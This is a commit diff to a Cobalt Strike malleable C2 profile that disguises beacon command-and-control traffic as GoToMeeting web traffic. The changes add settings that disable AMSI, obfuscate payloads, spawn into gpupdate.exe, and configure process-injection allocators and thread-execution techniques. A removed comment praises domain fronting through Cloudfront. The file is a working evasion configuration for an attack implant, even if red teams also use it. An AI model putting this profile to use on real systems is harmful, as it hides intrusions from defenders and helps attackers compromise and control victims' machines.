updated to work with 3.14.

normal/gotomeeting.profile

@@ -1,5 +1,5 @@
 #gotomeeting profile
-#works good using Cloudfront with domain fronting, especially since Cloudfront doesn't verify the CNAME you enter...
+#updated for 3.14
 #this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts.
 #xx0hcd
 
@@ -16,7 +16,6 @@ set sample_name "gotomeeting.profile";
 #    set password "your_store_pass";
 #}
 
-#ordering server response headers, from 3.13.
 http-config {
     set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection";
         header "Content-Type" "text/html;charset=UTF-8";
@@ -27,6 +26,8 @@ http-config {
 	header "X-Content-Type-Options" "nosniff";
 	header "X-Powered-By" "Brightspot";
 	header "Vary" "Accept-Encoding";
+        set trust_x_forwarded_for "false";
+    
 }
 
 http-get {
@@ -152,7 +153,6 @@ http-stager {
     set uri_x64 "/Meeting/32251816/";
 
     client {
-#set Host header to whatever, probably using stageless anyway right?
 #        header "Host" "whatever.gotomeeting.com";
         header "Accept" "*/*";
         header "Accept-Language" "en-US";
@@ -169,11 +169,18 @@ http-stager {
 ###Malleable PE Options###
 #always test spawnto and module stomp before using. My examples tested on Windows 10 Pro.
 
-set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
+post-ex {
-set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
 
-#attempt to disable amsi for execute-assembly, powerpick, and psinject from 3.13
+    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
-set amsi_disable "true";
+    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
+
+    set obfuscate "true";
+
+    set smartinject "true";
+
+    set amsi_disable "true";
+
+}
 
 #used peclone on wwanmm.dll. 
 #don't use 'set image_size_xx' if using 'set module_xx'
@@ -209,3 +216,28 @@ stage {
         strrep "beacon.x64.dll" "";
     }
 }
+process-inject {
+
+    set allocator "NtMapViewOfSection";		
+
+    set min_alloc "16700";
+
+    set userwx "false";  
+    
+    set startrwx "true";
+        
+    transform-x86 {
+        prepend "\x90\x90\x90";
+    }
+    transform-x64 {
+        prepend "\x90\x90\x90";
+    }
+
+    execute {
+        CreateThread "ntdll!RtlUserThreadStart";
+        CreateThread;
+        NtQueueApcThread;
+        CreateRemoteThread;
+        RtlCreateUserThread;
+    }
+}